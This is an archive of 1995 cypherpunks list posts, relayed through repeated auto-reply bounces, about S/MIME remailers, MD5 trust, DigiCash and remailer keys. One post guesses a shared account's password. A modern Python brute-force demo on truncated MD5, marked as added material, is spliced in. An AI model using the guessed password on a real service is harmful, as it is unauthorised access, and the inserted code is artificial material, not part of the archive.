Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  sameer[SMTP:sameer@c2.org]
Sent:  Tuesday, October 24, 1995 1:15 PM
To:  RobertW.Baldwin
Cc:  cypherpunks; raph
Subject:  Re: What is needed for S/MIME remailer ?


My understanding of S/MIME isn't excellent, so I figure there are
things I could be confused about which may make this a bit wrong..

I figure a command line S/MIME program which could easily be
integrated into a remailer would have the following features:

A) limit on number of multiple concurrent processes doing
decryption. Remailer spams have the bad effect of spawning hundreds of
concurrent PGPs on the mailhost, bringing things to halt. Limiting
number of concurrent decryptions would help this problem.

B) A strong interaction with the UNIX shell, with the program
returning a return code based on whether or not the decryption
succeeded. (Remailers only do decryptions...) That way a remailer
could do something like:

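#!/bin/sh
# "smime -f" is the hypothetical filter described above: exit status 0 only if decryption succeeded
if smime -f < incoming-message > /tmp/decrypted.$$
then
  # Process /tmp/decrypted.$$
  :
fi
rm incoming-message
rm /tmp/decrypted.$$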

 The option would also be a very low-cruft-output -- there
would be none of that PGP v2.6.2 stuff that PGP sends out. Just the
decrypted output and if the message can't be decrypted, nothing gets
output. (Maybe a -q option for that..)

 I think the smime should be easily plugged into premail as
well, but I don't know premail to know what would be necessary for
that. I suspect Raph would have some input on that matter.


>
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?
>                 --Bob Baldwin
>


 --
sameer      Voice:   510-601-9777
Community ConneXion    FAX:  510-601-9734
The Internet Privacy Provider   Dialin:  510-658-6376
http://www.c2.org (or login as "guest")   sameer@c2.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:28 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093123.1151.341076@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Dr. Frederick B. Cohen[SMTP:fc@all.net]
Sent:  Tuesday, October 24, 1995 4:01 PM
To:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]


...
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
> secure, ergo we cannot (completely) trust it. [Please correct if this is a
> substantially incorrect inference.]
>
> One of the standard responses is "it's the best we can do". When people said
> this about PGP, FBC made some (IMHO) interesting comments about the
> encryption he uses in various circumstances. Perhaps he would like to share
> his personal choices of one-way hash functions with us.

Since you asked:

It's a really complex issue.

 As a fundamental, we know that any "one-way" hash function must
be many-to-one, which means that, in practice, there are always large
numbers (2^large numbers) of sources for any given hash.  This means
that forgeries are always possible.

 I know of no way to prove that (and no convincing argument that
the workload for creating) a forgery is hard for any "one-way" hash
function.  This seems to mean that we are always betting on faith about
these things.

 The techniques that seem to be reasonably good are; modular
exponentiation in a modulus that's the product of two appropriate primes
(a.k.a.  RSA but throw out the private key when you create it); certain
classes of non-linear feedback shift registers of high degree; and some
general class of mixing algorithms like MD5.

 The RSA-type hash is slow, and some great mathematician may show
up tomorrow and lay waste to the whole thing.  Non-linear feedback shift
registers have the advantage that we don't know how to factor
high-degree equations, so we don't know how to make simple closed form
solutions to find output values.  MD5-type systems are good because they
combine diffusion and confusion and avoid a lot of the more well-known
flaws as far as we know.

 None of these reasons are particularly convincing, so I think we
have to take a risk management approach.  So the ultimate question here
is, how much are we willing to bet that nobody can break one of these in
the intended application over a particular time frame.

 I trust the RSA and NLFSR systems, if reasonably well
implemented, for a single short time-frame low-valued transaction.  For
example, pick a good pseudo-random number and create an RSA one-way hash
of 512 bits (the random number issue is of course another whole area),
encrypt the first block, Xor with the second block, encrypt the result,
etc.  till done, then Xor again with the original random seed, send the
file and the hash along with the one-way key, and get a confirmation
back within a few days.

 I don't trust any of them as a basis for running a major part of
an economy over open communications links, and I especially don't trust
them when combined or when the security of one depends on another.  To
run an economy, I think you need more redundancy, more personnel
security, more stop-loss capabilities, physically secure devices,
independent checks and balances, etc.

 Someone on this list mentioned that the banking system trusts
the RSA and MD5, etc.  but this seems to me to be a mischaracterization.
They trust these systems to an extent, but they have key change
requirements, regular audits, physical security, relatively secured
communications lines (when compared to the Internet), strong procedural
controls (most of the time), and other such protections, and they still
get hammered for a few million now and then.

 This is probably enough for now, since the list is probably
getting tired of my posts and I have made the major points.

 --
 -> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:25 PDT
To: sbryan@maroon.tc.umn.edu (Steve Bryan)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093123.1151.341077@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Steve Bryan[SMTP:sbryan@maroon.tc.umn.edu]
Sent:  Tuesday, October 24, 1995 3:08 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]


Dr. Frederick B. Cohen writes:

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
>allow the known plaintext attack that gets the RSA private key used to
>authenticate messages.  As far as I am aware (and I may not be aware of
>everything) there is no reference work to support this assumption.  If
>the assumption is wrong, then the whole SSL can fall to a selected
>plaintext attack launchable (presumably) through those general purpose
>Java applets we have heard so much about.

With a mailing list this large and diverse one can reasonably assume a range
of interests and expertise. What I don't understand is your agnostic stance
on something as apparently basic as MD5. If computer security is your
purported area of expertise why have you not reached any firm conclusions
about it? I understand that rigid conclusions are unsafe (eg they'll never
prove Fermat's last theorem) but it is not like every question is equally
open. Do you have a realistic attack on MD5 or is this sophomoric claptrap?
How do you propose to generate messages with specific message digests?
Assuming you could somehow, how do you proceed to use that information to
your advantage? So let's say I have a message digest and I'm retrieving the
allegedly corresponding message which you have the opportunity to alter to
your heart's content. How would you proceed, even in principle, to defeat
MD5? I realize I might be assuming too much when I posit that I have the
true MD5 for the message but my understanding is that you feel that MD5
might be vulnerable. I've given you all the known plaintexts. Is there a
next step?

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:38 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: RE: (fwd) Chaum vs. Stein
Message-ID: <1995Oct25.093123.1151.341079@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Robert Hettinga[SMTP:rah@shipwright.com]
Sent:  Tuesday, October 24, 1995 3:52 PM
To:  cypherpunks
Subject:  (fwd) Chaum vs. Stein



 --- begin forwarded text

To: www-buyinfo <www-buyinfo.allegra..att..com@mail.checkfree.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 24 Oct 95 13:38:40 EDT
Subject: Chaum vs. Stein

Wanted to save my 'me too' until a time I could piggy-back it onto something a
little more pithy (and I DO mean 'little'). Robert, thanks for taking the time
and energy for filtering cpx and forwarding the best. David, thanks for
providing the forum. Now that  _that's_  out of the way ...

I've just been handed a registration booklet for The Bank Administration
Institute's Retail Delivery '95 conference December 2-6 in Atlanta. Notable
speakers include The Bill, MasterCard CEO Eugene Lockhart, Visa International
CEO Edmund Jensen, Intuit CEO Scott Cook and Checkfree CEO Pete Kight (among
others).

Featured on page 6 is a "Fireside Chat: The Financial Marketplace of the
Future" moderated by Lou Dobbs... How warm and fuzzy. What really caught my eye
was a panel discussion on Internet Security scheduled for that Wednesday. The
panelists are David Chaum, Cybercash CEO William Melton, and FV CEO Lee Stein.

If anyone goes, tell us all how it went!

Kicker -  the postal frank is of the "non-profit organization" variety.
BAI's site is at http://www.bai.org

 --- end forwarded text


 -----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:46 PDT
To: todd@lgt.com (Todd Glassey)
Subject: RE: Sun speaks out - but not to the cyph
Message-ID: <1995Oct25.093124.1151.341080@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Todd Glassey[SMTP:todd@lgt.com]
Sent:  Tuesday, October 24, 1995 12:52 PM
To:  David A Wagner
Cc:  cypherpunks
Subject:  Re: Sun speaks out - but not to the cypherpunks


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02110101acaf51651ef9@[204.156.156.4]>,
>Todd Glassey <todd@lgt.com> wrote:
>[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
>> Pardon the flame but I really have just about heard enough of this BS...
>[...]
>> >> The area where we can (must) build trust is the computing base.
>> >> Traditionally, this has been the OS, but in the case of java, it is
>> >> the java interpreter (such as netscape 2.0 and hotjava).  The browser
>> >>  is now the TCB (trusted computer base) for all practical purposes...
>> >
>> >Read: The Java interpreter is supposed to be a TCB.
>[...]
>> >Who here truly believes that the implementations of Java meet the
>> >requirements of a TCB?
>[...]
>> Dr. Fred, you seem to spend a lot of energy slamming Java and HotJava.
>[ ... flame deleted ... ]
>
>
>No, here I think Dr. Cohen's comments are right on the mark.
>
>The Java interpreter *is* supposed to be a trusted computing base.
>Do we have any reason to believe that this trust is well-placed?
>
>(If you don't agree, go through the Orange Book evaluation criteria,
>and pay special attention to the assurance sections...)
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
>NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
>=UZH0
>-----END PGP SIGNATURE-----


Sorry about the above flame-war I caused.

My point was almost benign in and of itself. Yes, the Java concept is
sound, No, the currently available implementation has some real
architectural considerations that must be addressed in order that we can
build a stable and secure platform atop it.

My real issue is that there is so much time spent on this list knocking the
individual spokes that make up this wheel we call Electronic Commerce, that
it is more and more costly to filter out the technology from the background
noise. Still because of the value of that technology, I and others are
forced to spend precious hours reviewing all that comes across our desks.

Bluntly being an active member of several Security and Payment Mechanism
working groups I view some 150+ pieces of email a day and sometimes get
frustrated by the amount of noise, or the roar in the background, about
what are to the largest percentage of us, meaningless dribble... Still
there is the occasional golden nugget that makes it all worth while..

Again My apologies to have stirred up this mess. I will retreat under my
desktop from the melee that seems to be unending.

Todd




Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


 -----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
 -----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 25 Oct 95 07:35:36 PDT
To: cypherpunks@toad.com
Subject: CNN Interactive Internet privacy interview
Message-ID: <9510251435.AA07028@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Probably triggered by the USA Today article.

	<URL:http://www.cnn.com/TECH/9510/computer_privacy/index.html>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:36:34 PDT
To: remailer-operators@c2.org (Remailer Operators)
Subject: RE: Weekly Type-II Remailer List
Message-ID: <1995Oct25.093453.1151.341094@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  John A. Perry[SMTP:perry@alpha.jpunix.com]
Sent:  Tuesday, October 24, 1995 12:32 PM
To:  Mixmaster Mailing List; Remailer Operators; cypherpunks
Subject:  Weekly Type-II Remailer List

Sender: owner-cypherpunks@toad.com
Precedence: bulk

 -----BEGIN PGP SIGNED MESSAGE-----

ED: You might notice that gondolin has retired. (Sigh!)

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1


vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11


knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0


robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11


syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11


rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11


replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11


hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11


crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11


spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0


flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11


q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1


Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1


secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b


anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b


wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1


 John Perry - KG5RG - perry@alpha.jpunix.com - PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.



 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

 -----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:29 PDT
To: hfinney@shell.portal.com (Hal)
Subject: RE: Hack DigiCash: Payee Anonymity
Message-ID: <1995Oct25.093454.1151.341095@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Hal[SMTP:hfinney@shell.portal.com]
Sent:  Tuesday, October 24, 1995 12:44 PM
To:  cypherpunks
Subject:  Re: Hack DigiCash: Payee Anonymity


nobody@replay.com (Name Withheld by Request) writes:

>Now all we need to do is get some specs on how DigiCash's software works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
>bunch of forms, etc.  I suspect that most people would rather change money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

I don't believe this $250 is correct.  The only place I see such a number
is on the application form, in the following clause:

"A maintenance fee of the foreign equivalent of $10 will be imposed each
statement period if the balance in your account falls below the foreign
equivalent of $250 on any day of the period."

This is for a "WorldCurrency Access Interest Account", which I don't
think is what is used for ecash.  For ecash the account opening fee is
$11 and the per-month fee is $5.  I don't see any reference to required
account minimums.

As far as the issue of coding up a payee-blinding cash system compatible
with this ecash, I agree that it would be good to see some specs now that
ecash is for real.  IMO Chaum has been getting a free ride based on his
reputation, with many people assuming that anything he is associated
with must be done right.  It is time for him to open his hand and reveal
his protocols so that people know exactly what they are trusting their
money to.

Hal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:34:55 PDT
To: x85849i1@cadet1.usma.edu (x85849i1)
Subject: RE: Verification of Registration
Message-ID: <1995Oct25.093454.1151.341097@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Scott Brickner[SMTP:sjb@universe.digex.net]
Sent:  Tuesday, October 24, 1995 2:09 PM
To:  x85849i1
Cc:  cypherpunks
Subject:  Re: Verification of Registration


"Raymond Val" writes:
>Lynne L. Harrison writes:
>
>>  Curious.  Did anyone else receive this unsolicited *invitation*?
>
>Everybody who receives mail from cypherpunks@toad.com received this
>message because the message was addressed to
>cypherpunks@toad.com.  Apparently someone may have
>joined this 'group' or service and used the cypherpunks address as
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password.
>
>This would be my guess, of course.

Mine too.
>
>Does anybody know what this service does?

C|NET Central is a cable TV show which reports on the 'net.  The
service is their on-line address where you can get more details
on stuff they report.

Doesn't seem to be especially c-punks related, but I guess someone
didn't like the idea of having to reveal his identity just to look
at a web page.  You can probably assume that the password for the
"cypherpunks" userid on the server is either "cypherpunks" or
"writecode".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:05 PDT
To: mab@crypto.com (Matt Blaze)
Subject: RE: Hash collisions [was Re: MD5 weaknes
Message-ID: <1995Oct25.093455.1151.341098@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Matt Blaze[SMTP:mab@crypto.com]
Sent:  Tuesday, October 24, 1995 3:02 PM
To:  hallam
Cc:  cypherpunks
Subject:  Hash collisions [was Re: MD5 weakness ? ...]



>
>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue.
>
>Ron has not mentioned such an event to me and if that were the case I would
>seriously doubt that he would not have been told about it. The only comment he
>generally makes is that he wrote MD5 because "MD4 was making me nervous".
>
>>In the case of the trust being placed in MD5 by Netscape, the assumption
>>being made (without adequate support as far as I can tell) is that an
>>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>
>Netscape do not simply use the MD5 of the message, they are using (as I
>understand it) the PKCS#1 standard for making the signature. If not they
>probably have severe problems.
>
>>There has been no limit given by anyone on this list to the level of
>>trust they place in MD5.  Several people have posted (without
>>contention) that MD5 is sufficiently trustworthy to trust billions of
>>dollars in commerce to its being able to prevent a selected plaintext
>>attack as alluded to above.
>
>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable
>in many ways to MD5, it has a different approach to extending the scheduling and
>resist differential cryptanalysis. There is a problem with the compressor
>function of MD5 which I dislike. This is fairly irrelevant though since SSL
>allows other digests to be used.
>
> Phill

I hesitate to jump in to this exchange given the defensive and
vague nature of the discussion, but...

While I agree that SHA seems preferable, for a number of reasons,
to MD5, it is worth noting that Hans Dobbertin of the German Information
Security Agency recently found a collision in MD4. His attack
allows you to generate a pair of plaintexts that generate the same hash.
A fast technique for finding a second plaintext that hashes to some given
value remains an open problem with MD4 (and SHA and MD5, for that matter).

As far as I can tell the attack does not readily generalize to MD5
or SHA.

 -matt
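
Blaze's distinction between generating a colliding pair and finding a second plaintext for a given hash, as an added example that is not part of the original message. MD5 is cut down to 16 bits so that both generic searches finish quickly; the function names and test strings are chosen for this illustration and say nothing about Dobbertin's MD4 technique.

```python
"""Collision search versus second-preimage search on a shortened MD5."""
import hashlib
from typing import NamedTuple, Optional, Tuple


class Found(NamedTuple):
    first: bytes
    second: bytes
    tries: int      # candidate messages hashed before the match


def short_md5(msg: bytes, bits: int) -> int:
    """The top `bits` bits of MD5(msg), standing in for a small n-bit hash."""
    return int.from_bytes(hashlib.md5(msg).digest(), "big") >> (128 - bits)


def find_collision(bits: int, prefix: bytes = b"msg-") -> Found:
    """Any two messages with equal digests: the searcher is free to pick both."""
    seen = {}
    for i in range(2 ** bits + 1):      # pigeonhole bound on the search
        msg = prefix + str(i).encode()
        digest = short_md5(msg, bits)
        if digest in seen:
            return Found(seen[digest], msg, i + 1)
        seen[digest] = msg
    raise RuntimeError("unreachable: more messages than digest values")


def find_second_preimage(target: bytes, bits: int, budget: int,
                         prefix: bytes = b"alt-") -> Optional[Found]:
    """A different message matching the digest of one fixed `target`."""
    want = short_md5(target, bits)
    for i in range(budget):
        msg = prefix + str(i).encode()
        if msg != target and short_md5(msg, bits) == want:
            return Found(target, msg, i + 1)
    return None


def generic_cost(bits: int) -> Tuple[int, int]:
    """Expected hash evaluations for (collision, second preimage) when the
    function has no structural flaw: about 2^(n/2) versus about 2^n."""
    return 2 ** (bits // 2), 2 ** bits


if __name__ == "__main__":
    BITS = 16
    # Constructed input: stands for the checksum of an existing, trusted file.
    TRUSTED = b"official trusted version"
    col = find_collision(BITS)
    sp = find_second_preimage(TRUSTED, BITS, budget=2 ** 20)
    print("collision after", col.tries, "hashes:", col.first, col.second)
    print("second preimage after", sp.tries if sp else "more than 2^20", "hashes")
    print("generic cost for a 128-bit digest:", generic_cost(128))
```

For a full 128-bit digest the same generic costs are about 2^64 and 2^128, which is why a published collision does not by itself let anyone match the checksum of an existing file.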






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:18 PDT
To: hallam@w3.org (hallam)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093455.1151.341099@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  hallam[SMTP:hallam@w3.org]
Sent:  Tuesday, October 24, 1995 1:14 PM
To:  Dr. Frederick B. Cohen; cypherpunks
Cc:  hallam
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]

Precedence: bulk


>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue.

Ron has not mentioned such an event to me and if that were the case I would
seriously doubt that he would not have been told about it. The only comment he
generally makes is that he wrote MD5 because "MD4 was making me nervous".

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to

Netscape do not simply use the MD5 of the message, they are using (as I
understand it) the PKCS#1 standard for making the signature. If not they
probably have severe problems.

>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to its being able to prevent a selected plaintext
>attack as alluded to above.

NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable
in many ways to MD5, it has a different approach to extending the scheduling and
resist differential cryptanalysis. There is a problem with the compressor
function of MD5 which I dislike. This is fairly irrelevant though since SSL
allows other digests to be used.

 Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:35:28 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: RE: MD5 weakness ? [was Re: Netscape Log
Message-ID: <1995Oct25.093455.1151.341100@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Laurent Demailly[SMTP:dl@hplyot.obspm.fr]
Sent:  Tuesday, October 24, 1995 6:45 PM
To:  Dr. Frederick B. Cohen
Cc:  cypherpunks
Subject:  Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]


<grrrrrrr>

Frederick B. Cohen writes:
 > >  > [...] uses an MD5 checksum which the members
 > >  > of this list seem to place unlimited trust in (incorrectly in my view,
 > >  > but that would be picking two nits with one keyboard entry).

[me]> Can you elaborate WITH FACTS on the supposed weakness of MD5 ?
                        **********
I wonder what is your definition of facts...

 > I didn't say that there were any weaknesses in MD5, all I said was:
 >  "unlimited trust ... (incorrectly in my view...)"
 >
 > The lack of adequate demonstration of strength is not the same as a
 > weakness.  It represents only a lack of adequate assurance for placing
 > more than a certain amount of trust in MD5 for the purpose it is being
 > used to accomplish.
 >
 > As to weaknesses, I seem to remember that someone managed to forge a
 > modification to a program used to observe networks on a Sun so that it
 > had the same MD5 checksum as the official trusted version.  But whether
This is absolute bullshit with a probability of (2^128-1)/2^128
 > this is real is not strictly the issue.
On the contrary real things should be the issue... not random thoughts

 > In the case of the trust being placed in MD5 by Netscape, the assumption
 > being made (without adequate support as far as I can tell) is that an
because you can't tell 1+1=2 doesn't imply people have to worry...
 > MD5 checksum cannot be forced, through a chosen plaintext attack, to
 > yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
 > allow the known plaintext attack that gets the RSA private key used to
 > authenticate messages.  As far as I am aware (and I may not be aware of
 > everything) there is no reference work to support this assumption.  If
The fact that you obviously didn't take the time to do any
search/reading on the subject does not allow you to go on with mad
assumptions...
 > the assumption is wrong, then the whole SSL can fall to a selected
 > plaintext attack launchable (presumably) through those general purpose
 > Java applets we have heard so much about.
FYI,  ( false => false ) is a true expression... starting from false
assumption you can demonstrate *anything*
{ if 1+1!=2, lots of things "fall"}
 [me]> [btw who talked about 'unlimited' trust ?]
 > There has been no limit given by anyone on this list to the level of
 > trust they place in MD5.  Several people have posted (without
 > contention) that MD5 is sufficiently trustworthy to trust billions of
 > dollars in commerce to its being able to prevent a selected plaintext
 > attack as alluded to above.  If you think we should trust it, and you
 > don't limit your assessment of trust, what other assumption should I
 > make? If several people proclaim that trust and nobody stands up in
 > disagreement, tacit agreement is my normal (although not necessarily
 > justified) assumption.

AGAIN, the limit is 2^128 computer operations (as I quoted from the rfc
days ago), which is imo certainly NOT the weakest part of the security
chain...

Do you actually read anything people are mailing or writing ?
</grrrrrrr>

sorry again, I feel tested...

dl
 --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cracking SEAL Team 6 counter-intelligence DES Pasqua Qaddafi class struggle






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
